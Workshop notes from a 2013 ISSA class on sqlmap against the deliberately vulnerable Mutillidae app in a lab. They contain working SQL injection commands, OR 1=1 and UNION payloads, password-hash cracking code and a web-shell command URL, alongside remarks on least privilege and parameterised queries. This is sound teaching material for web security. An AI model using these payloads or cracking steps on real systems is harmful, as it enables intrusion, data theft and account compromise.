Basics of using sqlmap - ISSA Kentuckiana workshop 8 - Jeremy Druin

This is the 8th in a line of classes Jeremy Druin will be giving on pen-testing and web app security featuring Mutillidae (or other tools) for the Kentuckiana ISSA. This one covers sqlmap.

Details: Video Tutorials: www.youtube.com/user/webpwnized

Recorded at the ISSA Kentuckiana February 2013 Workshop, this video reviews the use of sqlmap, an automated SQL injection audit tool. The video walks through using sqlmap to locate a SQL injection, determine the backend database type, enumerate the database account, databases, schema, tables, columns and password hashes, then use the database to compromise the Windows host. Dumping data, arguably the primary use of sqlmap, is covered only briefly since there is already a large amount of documentation on this feature.

Environment

The environment is a BackTrack 5 R3 "attacker" at IP 192.168.56.101 and a Windows XP "victim" at 192.168.56.102, running as virtual machines on Oracle VirtualBox. The Windows XP host runs XAMPP, on which Mutillidae is installed. Mutillidae may also be installed on WAMP or LAMP stacks, including on Linux. Using two hosts is not necessary to recreate the lab exercise; all of the items can be reproduced on "localhost".

The database was created by installing XAMPP, unzipping the Mutillidae files into the C:\xampp\htdocs\ directory, then clicking the "Set up database" button in Mutillidae. Mutillidae has a deliberately vulnerable login page against which the SQL injection was carried out.

Notes from Presentation

Please find notes from the talk below which can be used to follow along with the video.

--help            Help
--------------------------------------------------
./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner
--------------------------------------------------
URL: http://192.168.56.102/mutillidae/index.php?page=login.php

Request (saved to a file so it can be handed to sqlmap with -r):
POST /mutillidae/index.php?page=login.php HTTP/1.1
username=asdf&password=asdf&login-php-submit-button=Login

The -r option takes a raw HTTP request as captured by a proxy; sqlmap reads the target from the request line and Host header, keeps any cookies and other headers, and tests every GET and POST parameter it finds, so the request file replaces --url and --data.
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options>

--banner          web server operating system: Windows
--fingerprint     web server operating system: Windows
--current-user    Retrieve DBMS current user
                  current user: 'root@localhost'
--users           Enumerate DBMS users
                  database management system users
--dbs             Enumerate DBMS databases
                  available databases [10]:

The application connects to MySQL as root, so every later step (reading mysql.user, writing files onto the web server) runs with full DBMS privileges; a least-privilege database account for the web application would block most of them.
--------------------------------------------------
--tables          Enumerate DBMS database tables
--------------------------------------------------
--dump            Dump DBMS database table entries
--------------------------------------------------
./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns

The query behind --columns on MySQL:
select column_name from information_schema.columns where table_name = 'user' [42]:
--------------------------------------------------
The query built by the Mutillidae login page, with a single quote injected into the password field:
SELECT * FROM accounts WHERE username='' AND password='''

./sqlmap.py -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner

--prefix=PREFIX   Injection payload prefix string
--suffix=SUFFIX   Injection payload suffix string

--prefix and --suffix are wrapped around every payload sqlmap sends so that the injected string closes the quoted context it lands in and comments out the remainder of the original query. sqlmap normally works these out during detection; they are set by hand when detection fails or when the query structure is already known from an error message.
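As an added example (not code from the page, from sqlmap or from Mutillidae), the following rebuilds the login query above against an in-memory SQLite database so the steps sqlmap automates (quote probe, prefix/suffix wrapping, authentication bypass, UNION extraction) can be driven by hand, and contrasts them with a parameterised query. Table names, rows and passwords are constructed; the credit_cards table stands in for whatever --dump would target.

```python
"""
Added example (not from the original page, sqlmap or Mutillidae): the
vulnerable login query next to its parameterised fix, on SQLite.
"""
import sqlite3


def build_db():
    # Constructed data; SQLite stands in for the MySQL backend in the lab
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE accounts(username TEXT, password TEXT);
        INSERT INTO accounts VALUES ('admin', 'adminpass'), ('simba', 'monkey');
        CREATE TABLE credit_cards(ccnumber TEXT, ccv TEXT);
        INSERT INTO credit_cards VALUES ('4444111122223333', '745'),
                                        ('7746536337776330', '123');
    """)
    return con


def login_vulnerable(con, username, password):
    # Same construction as the Mutillidae page: user input pasted into SQL
    sql = "SELECT * FROM accounts WHERE username='%s' AND password='%s'" % (
        username, password)
    return con.execute(sql).fetchall()


def login_fixed(con, username, password):
    # Placeholders hand the values to the driver; they can never become SQL
    sql = "SELECT * FROM accounts WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchall()


def probe_quote(con):
    """sqlmap's first move: inject a lone quote and watch for a DB error.
    Produces the  password='''  query shown on the page."""
    try:
        login_vulnerable(con, "asdf", "'")
    except sqlite3.OperationalError:
        return True
    return False


def wrap(payload, prefix="'", suffix="-- "):
    """What --prefix/--suffix do: close the quoted context before the payload
    and comment out the rest of the original query after it."""
    return prefix + payload + suffix


if __name__ == "__main__":
    con = build_db()
    print("error on bare quote:", probe_quote(con))
    # Authentication bypass:  username='' OR 1=1-- ' AND password='x'
    print(login_vulnerable(con, wrap(" OR 1=1"), "x"))
    # Data extraction, the hand-driven version of --dump
    print(login_vulnerable(con, wrap(" UNION SELECT ccnumber, ccv FROM credit_cards"), "x"))
    # The parameterised query treats the same payload as a literal username
    print(login_fixed(con, wrap(" OR 1=1"), "x"))
```

The UNION payload has to supply as many columns as the original SELECT returns, which is why sqlmap enumerates column counts before dumping; the fixed query returns nothing for the same input because the payload is compared as a username, never parsed as SQL.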
--------------------------------------------------
select User, Password from mysql.user

versus

./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc"

select User, Password from mysql.user order by User desc
select User, Password, Host, authentication_string from mysql.user order by User desc [9]:

--sql-query runs an arbitrary statement through the injection point; reading mysql.user only works because the injected session has root's privileges on the mysql database.
--------------------------------------------------
John the Ripper Command Line
/pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes

Password Hashes in MySQL Format
Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5
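As an added example (not code from the page or from John the Ripper), the following computes the MySQL 4.1+ hash format shown above, the one John handles as mysql-sha1, and runs a wordlist against a constructed hash file laid out the way John expects. User names, the wordlist and the bob/carol hashes are constructed; alice's hash is the widely published MySQL hash of "password".

```python
"""
Added example (not from the original page or John the Ripper): the MySQL
4.1+ password hash, and a wordlist check over a user:hash file.
"""
import hashlib


def mysql41_hash(password):
    """MySQL PASSWORD() since 4.1: '*' + uppercase hex of SHA1(SHA1(pw)).
    There is no salt, so equal passwords always give equal hashes."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Constructed hash file in the user:hash layout John reads for --format=mysql-sha1
HASH_LINES = [
    "alice:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19",   # 'password'
    "bob:" + mysql41_hash("letmein"),                     # constructed
    "carol:" + mysql41_hash("correct-horse-battery"),     # not in the wordlist
]

WORDLIST = ["123456", "password", "letmein", "qwerty"]


def parse_hash_line(line):
    """Split 'user:*HASH' into its parts, normalising the hex to upper case."""
    user, _, digest = line.strip().partition(":")
    return user, digest.upper()


def crack(hash_lines, wordlist):
    """Unsalted hash: hash the wordlist once, then look every user up in it."""
    table = {mysql41_hash(word): word for word in wordlist}
    found = {}
    for line in hash_lines:
        user, digest = parse_hash_line(line)
        if digest in table:
            found[user] = table[digest]
    return found


if __name__ == "__main__":
    for user, password in crack(HASH_LINES, WORDLIST).items():
        print("%s: %s" % (user, password))
```

Because the format is unsalted, one hashed wordlist covers every row of mysql.user at once, which is why a dump of this table is worth far more to an attacker than the same number of per-user salted hashes.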
--------------------------------------------------
View transaction: tcpdump -i eth1 -vvv -X

sc query state= all

http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101

The <temp file name> is the command-execution page sqlmap writes onto the web server through the database (what its --os-shell and --os-cmd options drive); a ping back to the attacker, watched with tcpdump, confirms that commands actually run on the host before anything else is attempted.
--------------------------------------------------
Installing PyMySQL Dependency (needed for direct database connections with -d)
git clone https://github.com/petehunt/PyMySQL/

./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10
Copyright 2020, IronGeek